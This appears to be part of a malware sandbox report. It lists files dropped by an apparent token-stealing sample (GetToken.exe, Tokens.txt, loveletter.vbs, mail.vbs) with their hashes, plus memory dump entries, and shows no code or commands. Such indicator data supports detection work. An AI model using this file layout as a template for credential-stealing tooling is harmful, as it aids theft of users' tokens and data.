f3abadc0433d6d5a77894dad672e8b1ece790b858588191c99f98f1a498169294e8914e140b7fb9157109ba5d739614c5b821682d067767fcb889753ad540c33

Download Submit
C:\Users\Admin\FuckPorts.cmd

Filesize
358B

MD5
d479d6692927ae2e594a39e180815956

SHA1
9438c4a0e47b68808ce12cd20683d880fb73e40a

SHA256
a457a6a95d64a7596931c0275831a40b4d04589718d281b97d71bccabd5714a1

SHA512
11725124372392ceff46a69b99237def45cdb2eff0105db15c702248444d0edb0874411fa90a06333ab047e4a1a2fdec7d466c1998e6d75019475100e6d71016

Download Submit
C:\Users\Admin\GetToken.exe

Filesize
8KB

MD5
2ed86e80ea9b4b95b3e52ed77ea6c401

SHA1
5032e67b7c84362374b7d52507ab83ae03d7ebff

SHA256
6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983

SHA512
64fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71

Download Submit
C:\Users\Admin\GetToken.exe

Filesize
8KB

MD5
2ed86e80ea9b4b95b3e52ed77ea6c401

SHA1
5032e67b7c84362374b7d52507ab83ae03d7ebff

SHA256
6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983

SHA512
64fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71

Download Submit
C:\Users\Admin\IP.txt

Filesize
13B

MD5
d3225435e2148071bf09023b569c4627

SHA1
b317b6374fd8e03816baa68dafc463de6cc585ff

SHA256
c4368d96ada6c17e802f4f5877bc0cb1ce445aaf4e8117eac76566415c92dbc3

SHA512
dbaab1f49fd9cbbafdbeb14bee05244b40c74b0f63e3881afac686f4c62e9f92bb527d28588039a6bf06e9a7b0a83e3c77d76c67f74c9fb19089c7d678b48b36

Download Submit
C:\Users\Admin\Tokens.txt

Filesize
22B

MD5
3d74b4a3f6053a5a252f4faee7fb157e

SHA1
576c1a2892dad89c3b6aba698ee67258be827eaf

SHA256
445f09c32e44ec144320d929de814ceda449da7efa062a19c1cc78cde29fb139

SHA512
dab16b5c564af14fb632f086b99530061d86f54cffed6bfa1b9ae59f97b77beec8ae89c132e2a217d555df512c75bb236921014ac0ff8053c88af16a96db7529

Download Submit
C:\Users\Admin\apps.txt

Filesize
8KB

MD5
6bf4cd4f0d7fe6d03030441cc05d10bc

SHA1
cc7017ae89ccd9881675d1374520c73ebfc09ca4

SHA256
d96b64543b6a19c6a9e660950d348f1690486ef2a68879f1694cac46158cb106

SHA512
fac10fd326830c2247497c59e2f6b391eb34c34bef5baa4a9ec12f60a4aa0342a9d18d81afeb0f476077dfbd6cfd9a3ce313b3f6a1dcb6d968a20c9856c4b883

Download Submit
C:\Users\Admin\loveletter.vbs

Filesize
495B

MD5
900ead69492d80e48738921eca28b14f

SHA1
6b51607c54f8e734a7ea47091859c3e8dce6365c

SHA256
c1a49c4801603e877e673620c289d709c5c2b368dae72e941f9649889faefab3

SHA512
8fbb63ea9e5e2bca05bdbcf373056e58aaae2dfd180dfca2fdfdc2b706bb3923798f9878eddf7acef255676eda65f94cc9a827e8abcc9d4da6613f33d74861f2

Download Submit
C:\Users\Admin\mail.vbs

Filesize
488B

MD5
88ef4bc3f48eeb97aedadff8f3840980

SHA1
48e8167bef2562d902885a075f6190d269fd3d35

SHA256
b62346a7425cfec83d3f05fc4ff268510a16493479f09e7113169aaad5abeefa

SHA512
523127a83202c86445825e1d8ab84a268e4f9b40a7c76b91b4947fb29de1c0819ba3e856bc1cbd40d6b0d10c04ca356a5e0dc975708a3d765ab425ab1a7d1024

Download Submit
C:\Users\Admin\userdata.txt

Filesize
24KB

MD5
7ab194ce56d12acf3d9ad5abfd95bfd0

SHA1
f1f5d00fe9bf38a4d61576e2f4fa95595dc119af

SHA256
bee57479015b9915a22522c247d289f7c1c488e782e3e1fc1281ebd796aa7738

SHA512
c6979eff1a56c48c0538356687e07aabf182018df29323b74cbc2ae87645ed8b39ebb36541cc03c17abfa99e62b7cae78d25b765574ca011a68071c3d183355c

Download Submit
memory/1408-133-0x000002A6348F0000-0x000002A634912000-memory.dmp

Filesize
136KB

Download
memory/1408-134-0x00007FFC6B800000-0x00007FFC6C2C1000-memory.dmp

Filesize
10.8MB

Download
memory/1512-143-0x00007FFC6B4E0000-0x00007FFC6BFA1000-memory.dmp

Filesize
10.8MB

Download
memory/1900-225-0x00007FFC6ACD0000-0x00007FFC6B791000-memory.dmp

Filesize
10.8MB

Download
memory/1952-235-0x00007FFC69550000-0x00007FFC6A011000-memory.dmp

Filesize
10.8MB

Download
memory/2136-210-0x00007FFC6B740000-0x00007FFC6C201000-memory.dmp

Filesize
10.8MB

Download
memory/2320-208-0x00007FFC6B740000-0x00007FFC6C201000-memory.dmp

Filesize
10.8MB

Download
memory/2340-212-0x00007FFC6B740000-0x00007FFC6C201000-memory.dmp

Filesize
10.8MB

Download
memory/3604-223-0x00007FFC6AD60000-0x00007FFC6B821000-memory.dmp

Filesize
10.8MB

Download
memory/3708-217-0x00007FFC6AD80000-0x00007FFC6B841000-memory.dmp

Filesize
10.8MB

Download
memory/4028-233-0x00007FFC69550000-0x00007FFC6A011000-memory.dmp

Filesize
10.8MB

Download
memory/4244-220-0x0000000000B20000-0x0000000000B28000-memory.dmp

Filesize
32KB

Download
memory/4756-230-0x00007FFC69550000-0x00007FFC6A011000-memory.dmp

Filesize
10.8MB

Download
memory/4856-209-0x00007FFC6B740000-0x00007FFC6C201000-memory.dmp

Filesize
10.8MB

Download